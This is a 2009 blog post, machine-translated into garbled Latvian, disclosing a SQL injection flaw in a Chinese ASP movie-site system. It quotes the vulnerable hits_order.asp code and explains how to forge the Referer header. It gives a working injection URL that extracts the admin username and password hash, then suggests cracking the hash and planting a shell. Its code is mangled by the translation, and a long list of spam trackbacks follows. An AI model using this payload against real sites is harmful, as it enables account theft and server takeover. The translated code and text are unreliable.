RSS

Acu dienu filmu sistēma 0day

Šis ieraksts tika publicēta 25 Okt 2009

: St0p & My5t3ry
Reproducēt, lūdzu, norādiet avota http://www.st0p.org

Oh, un My5t3ry nākt klajā ar caurumu, sazinieties ar oficiālo administratoru, nav bijis uzmanību man.

Pirmkārt, ļaujiet man injicē problēmu

Nepilnību failu / p_inc / hits_order.asp 

 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30

  <- # Include file = ".. / P_inc / config.asp!" ->
 <- # Include file = ".. / P_inc / function.asp!" ->
 <- # Include file = ".. / P_inc / function_func.asp!" ->
 <- # Include file = ".. / P_inc / openconn.asp!" ->
 <- # Include file = ".. / P_inc / G_function.asp!" ->
 <%
 Then Ja ne ChkPost () Tad
	 G_error_page_1 reakcija. Novirzīt G_error_page_1
	 ( ) atbilde beigas ()
 Beigām, ja
 "Zvanu ChkPost / p_inc / function.asp fails () funkciju, lai konstatētu avota URL
 url,numb ) Funkciju G_hitss (URL, sastindzis)
	 Dim iela
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "select top" & sastindzis un "id, m_name, m_pic, m_hits, m_content no qingtiandy_movie kur m_look = 1 Pasūtot m_hits DESC, id DESC"
             "Es redzēju, ka nav sastindzis, neviens filtrs
	 server . CreateObject ( G_RS ) Set rs = serveris CreateObject (G_RS).
	 , 1 rs. atvērts SQL, CONN, 1, 1
	 i = 1
	 Do Kaut arī ne rs. EOF 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演:" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = str & "<div class=kkk1_list> <a class=bbb href=" & d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</> (" & rs (3) & ") </ div>
		 i = i + 1
		 rs. movenext
	 Cilpa
	 G_hitss = str
 End Function
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss (lūgums (" url "), pieprasījums (" sastindzis "))%>")
 "Šeit sastindzis filtrs

Metožu izmantošana, piemēram,
1, jūs varat tieši izmantot programmatūru kalti Referer, apmeklējiet šo adresi, lai sasniegtu
Caur XMLHTTP kalti Referer, apmeklējiet šo adresi īstenošanu
3, JS JavaScript, lai kontrolētu avota URL 

 

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. dokuments rakstīt (<a href='/p_inc/hits_order.asp?numb=1 (select str_username no tbl_admin) kā username,(select str_pass no tbl_admin) kā pass,'> zinātniskās fantastikas </> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (izvēlieties str_username no tbl_admin) kā lietotājvārdu, (izvēlieties str_pass no tbl_admin), kā caurlaide,

Piezīme: lai lēkt pār Referer atklāšana var caur POST, GET, COOKIE dažādas veidus, kā sasniegt injicēt. . .

Piekļuve šiem, administrators lietotājvārdu URL no saites, paroli HASH parādīts tieši ārā. .

Kreka paroles hash, jo fons var tieši rediģēt ASP failu, uz fona un veikt SHELL līniju.

Šī procedūra, ir arī citas nepilnības. Šeit netiek veikts. .

, , ,
Mācīties ° cīņas mākslas Mīklas
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag

  1. 180 Trackback (-i)

  2. 30 oktobris, 2009: acu dienu filmu sistēma 0day _AT_ Molutran blogs
  3. Nov 6, 2011: Hewlett NY Durvju uzstādīšana
  4. Nov 8, 2011: smieklīgi istaba
  5. Nov 9, 2011: Sākums Raksti
  6. Nov 10, 2011: Demerol Rehab
  7. Nov 11, 2011: Roofing piešķirta kvalifikācija Harveysburg no OH
  8. Nov 23, 2011: kā spēlēt kazino spēles
  9. Nov 24, 2011: Faye Reagan
  10. Nov 28, 2011: Gander Mountain promo kodu
  11. Nov 29, 2011: darbs slimība prasība
  12. Dec 9, 2011: mājas PLĀNI
  13. Dec 11, 2011: ūdens Ionizer pārskats
  14. Dec 12, 2011: šaušanas spēles
  15. Dec 12, 2011: regtool
  16. Dec 12, 2011: cīņas māksla
  17. Dec 13, 2011: Stenokardija
  18. Dec 14, 2011: Lietoti apvidus Pārdod
  19. Dec 14, 2011: ar portatīvo datoru
  20. Dec 14, 2011: ar Lietotie Grondverzetters Pārdod
  21. Dec 16, 2011: Instant Video straumēšana
  22. Dec 17, 2011: Kā Routers
  23. Dec 18, 2011: no Pokemon MMORPGs
  24. Dec 19, 2011: Liberty Reserve investīcijas
  25. Dec 20, 2011: iPhone Gaisma, Up Logo
  26. Dec 20, 2011: payday loanin
  27. Dec 23, 2011: klick hier
  28. Dec 23, 2011: Carrier detaļas
  29. Dec 24, 2011: Euro Millions loterijas
  30. Dec 26, 2011: biznesa katalogs Londona
  31. Dec 27, 2011: http://walkfit.webstarts.com
  32. Dec 28, 2011: http://www.pkv-wechsel.eu/
  33. Dec 31, 2011: reconquistar
  34. Dec 31, 2011: datingsites vergelijken
  35. Jan 1, 2012: bezmaksas tiešsaistes spēles
  36. Jan 2, 2012: Daba, Iedvesma,
  37. Jan 2, 2012: bioloģiskās SEO
  38. Jan 4, 2012: veidot atpakaļsaišu
  39. Jan 4, 2012: reconquistar
  40. Jan 5, 2012: Profesionālie atsākas
  41. Jan 5, 2012: santorum
  42. Jan 5, 2012: autoavārijas traumām
  43. Jan 6, 2012: Joga apģērbs
  44. Jan 6, 2012: printable kā slavenā apavu kuponiem
  45. 6 Jan, 2012: izdarīt likmi, kas
  46. Jan 6, 2012: dziedātājs dziesminieks
  47. Jan 6, 2012: videofilmu New Brunswick NJ
  48. Jan 6, 2012: annualcreditreport.com
  49. Jan 7, 2012: kleita klēts
  50. Jan 7, 2012: roku darbs tapa
  51. Jan 7, 2012: Mājas lapa
  52. Jan 8, 2012: Invisalign la
  53. Jan 8, 2012: Dzīvnieku Pak, pārskats,
  54. Jan 9, 2012: Santa Monica keratīna apstrāde
  55. Jan 9, 2012: ķermeņa bildar
  56. Jan 10, 2012: cisas
  57. Jan 10, 2012: bezmaksas izmaksā apsekojuma vietās
  58. Jan 10, 2012: socks5 pakalpojums
  59. Jan 11, 2012: atkarību ārstēšanas centri
  60. Jan 11, 2012: ārkārtas laika brīdinājumi Palīdzība
  61. Jan 12, 2012: zelta investīcijas
  62. Jan 13, 2012: klaiņojošu pūdeļa mediji copywriting
  63. Jan 13, 2012: pielūgsmes ierakstiem
  64. Jan 13, 2012: pretlīdzekļus grēmas
  65. Jan 13, 2012: kafijas automāti
  66. Jan 14, 2012: dzīvoklis jumta Fairmount no OH
  67. Jan 14, 2012: iPad 3
  68. Jan 16, 2012: Mīlestība Nicole Scherzinger feat donnely
  69. Jan 17, 2012: suplementos deportivos
  70. Jan 18, 2012: lotoss tarot
  71. Jan 20, 2012: vatmans, Ekstrakcijas kapsulas
  72. Jan 20, 2012: lejupielāde kaujas lauks
  73. Jan 21, 2012: portarollo
  74. Jan 24, 2012: milzis robots motors seo
  75. Jan 24, 2012: antykwariat tiešsaistē
  76. Jan 25, 2012: dziedātājs
  77. Jan 27, 2012: Zobu implants sinusa ir lifts los angeles
  78. Jan 27, 2012: Seattle seo
  79. Jan 27, 2012: roku rotaslietas
  80. Jan 28, 2012: keratīna
  81. Jan 29, 2012: Alpha Garantija
  82. Jan 30, 2012: mācību
  83. Jan 30, 2012: igun Pro
  84. Feb 1, 2012: i love joga,
  85. Feb 1, 2012: KOSMĒTIKA modelis
  86. Feb 2, 2012: modeļu aģentūra
  87. Feb 3, 2012: smokings noma
  88. Feb 4, 2012: bioloģiskās SEO
  89. Feb 4, 2012: San Diego auto negadījumā Jurists
  90. Feb 5, 2012: pātagas cirtiens kompensācija
  91. Feb 5, 2012: topiņi
  92. Feb 6, 2012: medicīnas nolaidība prasības
  93. Feb 6, 2012: darba traumas
  94. Feb 6, 2012: medicīnas nolaidība prasības
  95. Feb 7, 2012 skaits: twitter sekotāju
  96. Feb 10, 2012: mclay laivas
  97. 10 Feb, 2012: kanalizācijas cauruļu attīrīšanai, collas Tuvajos upes MD
  98. Feb 13, 2012: Warlock PvP Guide,
  99. Feb 13, 2012: temperatūra mežizstrādātājam
  100. Feb 15, 2012: łuszczyca
  101. Feb 16, 2012: atpūtas mājas in Auckland
  102. Feb 17, 2012: franšīzes pārdošana NZ
  103. 18 Feb, 2012: Pērk dozimetra
  104. Feb 18, 2012: lēts eļļas maiņa kupons
  105. Feb 18, 2012: Saitek Pro Flight kaujas stūres pedāļi
  106. Feb 18, 2012: Tela
  107. Feb 19, 2012: Top Penny Krājumi
  108. Feb 20, 2012: TX Apdrošināšana
  109. Feb 21, 2012: Great Gatsby Vasks
  110. Feb 21, 2012: īre aprīkojums Auckland
  111. Feb 21, 2012: pelnīt naudu pārdodot savu mūziku
  112. Feb 22, 2012: Dienas piedāvājumi
  113. Feb 22, 2012: laivas lv
  114. Feb 22, 2012: Dāvana vecmāmiņa
  115. Feb 23, 2012: Vīriešu ādas jakas
  116. Feb 23, 2012 skaits: Labākie matrači
  117. Feb 23, 2012: dubultstikls pārbūvēt
  118. 23 Feb, 2012: rožu zelta iesaistīšanās gredzeni
  119. 24 Feb, 2012: Sudraba, MELT vērtības
  120. Feb 26, 2012: suns snuggie
  121. Feb 27, 2012: New York īpašumi plānošanas attorney
  122. Feb 27, 2012: , Paladin atpūta
  123. Mar 1, 2012: senuke x pārskats
  124. Mar 1, 2012: kemperi pasaule
  125. Mar 3, 2012: psihika
  126. Mar 5, 2012: Aboubacar
  127. Mar 7, 2012: Leander cīņas māksla
  128. Mar 8, 2012: apdrošināšana lv
  129. Mar 8, 2012: pārgājienu veikali
  130. Mar 9, 2012: benchtops Auckland
  131. Mar 10, 2012: Scuba
  132. Mar 10, 2012: Maurīcija
  133. Mar 10, 2012: augšupielādēt video
  134. Mar 11, 2012: Directtoys.de
  135. Mar 12, 2012: psihisks rādījumus
  136. Mar 13, 2012: sacīkšu auto braukšanas pieredze
  137. Mar 16, 2012: Pārlēkt rokasgrāmata
  138. Mar 17, 2012: bezmaksas psihisks tērzēšana
  139. Mar 17, 2012: reklamy Sopot
  140. Mar 18, 2012: bezmaksas spēles
  141. Mar 19, 2012: Anissa
  142. Mar 21, 2012: interneta zivis veikals
  143. Mar 22, 2012: Dienas piedāvājumi
  144. Mar 23, 2012: zirgu krāsas
  145. Mar 24, 2012: Deivs Sūkņi
  146. Mar 25, 2012: velosipēds spēles
  147. Mar 28, 2012: sejas mazgāšanai taukainai ādai
  148. Mar 30, 2012: tatuaggi
  149. Apr 5, 2012: dinārs
  150. Apr 6, 2012: mans noslēpums blāzma
  151. Apr 6, 2012: Gratio
  152. Apr 7, 2012: zoli
  153. Apr 7, 2012: hunterpvp
  154. Apr 7, 2012: Mage PvP
  155. Apr 7, 2012: Nedēļas, darījumi
  156. Apr 9, 2012: antykwariat poleca
  157. Apr 10, 2012: Ares, Bezmaksas
  158. Apr 10, 2012: gardeningrecipe
  159. Apr 10, 2012: toprczone
  160. Apr 15, 2012: เพลง ใหม่ ภ
  161. Apr 18, 2012: mehānika Auckland
  162. Apr 18, 2012: Koka žalūzijas
  163. 18 Apr, 2012: Šis pants Šis raksts bija
  164. Apr 19, 2012: Solo Hd
  165. 20 Apr, 2012: redzēt šo
  166. Apr 20, 2012: logi Auckland
  167. Apr 21, 2012: tiešsaistes psihisks lasījumos
  168. Apr 22, 2012: Top SEO Pakalpojumi
  169. Apr 22, 2012: Dynamic Izolācija
  170. Apr 22, 2012: Segway Tours
  171. Apr 22, 2012: Supply Chain Management Course,
  172. Apr 22, 2012: SEO Services of Glasgow
  173. Maijs 3, 2012: ko darīt, lai pārdotu - zelts
  174. 11 maijs, 2012: aveņu ketonu papildinājums
  175. 13 maijs, 2012: accouterment arghool apophyllite
  176. 16 maijs, 2012: Chanel somas
  177. 19 maijs, 2012: Lapas
  178. 19 maijs, 2012: LiPo 6 melnā ultra koncentrāta atsauksmēm
  179. 19 maijs, 2012: bestunderwatercameras.net /
  180. 19 maijs, 2012: Rozmówki rosyjsko - japońskie
  181. 23 maijs, 2012: meistars FrontPage

Jums ir jābūt pieteicies Lai ievietotu komentārus.